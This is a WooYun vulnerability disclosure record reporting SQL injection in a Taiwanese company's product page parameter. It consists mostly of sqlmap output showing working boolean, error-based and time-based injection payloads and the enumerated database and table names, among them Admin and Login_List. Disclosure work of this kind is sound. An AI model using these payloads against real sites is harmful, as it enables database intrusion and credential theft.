当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156240

漏洞标题:台灣某國際股份有限公司官网存在注入(臺灣地區)

相关厂商:台灣某國際股份有限公司

漏洞作者: 孤心

提交时间:2015-11-27 16:08

修复时间:2016-01-14 16:08

公开时间:2016-01-14 16:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-27: 细节已通知厂商并且等待厂商处理中
2015-11-30: 厂商已经确认,细节仅向厂商公开
2015-12-10: 细节向核心白帽子及相关领域专家公开
2015-12-20: 细节向普通白帽子公开
2015-12-30: 细节向实习白帽子公开
2016-01-14: 细节向公众公开

简要描述:

我的滑板鞋,时尚 时尚 最时尚...

详细说明:

http://**.**.**.**/product/products.php?cid=3


[09:26:22] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[09:26:22] [INFO] fetching database names
[09:26:22] [INFO] the SQL query used returns 3 entries
[09:26:23] [INFO] retrieved: information_schema
[09:26:23] [INFO] retrieved: 168green-glowcom
[09:26:23] [INFO] retrieved: test_db
available databases [3]:
[*] 168green-glowcom
[*] information_schema
[*] test_db

漏洞证明:

C:\admin\sqlmap>sqlmap.py -u "http:
//**.**.**.**/product/products.php?cid=3" -v 1 --tables -D "168green-g
lowcom"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151124}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 09:37:30
[09:37:31] [INFO] resuming back-end DBMS 'mysql'
[09:37:31] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: cid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cid=3 AND 4841=4841
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: cid=3 AND (SELECT 3685 FROM(SELECT COUNT(*),CONCAT(0x71626a7071,(SE
LECT (CASE WHEN (3685=3685) THEN 1 ELSE 0 END)),0x7176706b71,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: cid=3 AND SLEEP(5)
---
[09:37:32] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[09:37:32] [INFO] fetching tables for database: '168green-glowcom'
[09:37:32] [INFO] heuristics detected web page charset 'ascii'
[09:37:32] [INFO] the SQL query used returns 8 entries
[09:37:32] [INFO] retrieved: Admin
[09:37:34] [INFO] retrieved: Bag
[09:37:34] [INFO] retrieved: Contact
[09:37:34] [INFO] retrieved: Counter
[09:37:34] [INFO] retrieved: Login_List
[09:37:34] [INFO] retrieved: Mail
[09:37:34] [INFO] retrieved: News
[09:37:34] [INFO] retrieved: Products
Database: 168green-glowcom
[8 tables]
+------------+
| Admin |
| Bag |
| Contact |
| Counter |
| Login_List |
| Mail |
| News |
| Products |
+------------+
[*] shutting down at 09:37:34

修复方案:

过滤.

版权声明:转载请注明来源 孤心@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-11-30 16:07

厂商回复:

感謝通報

最新状态:

暂无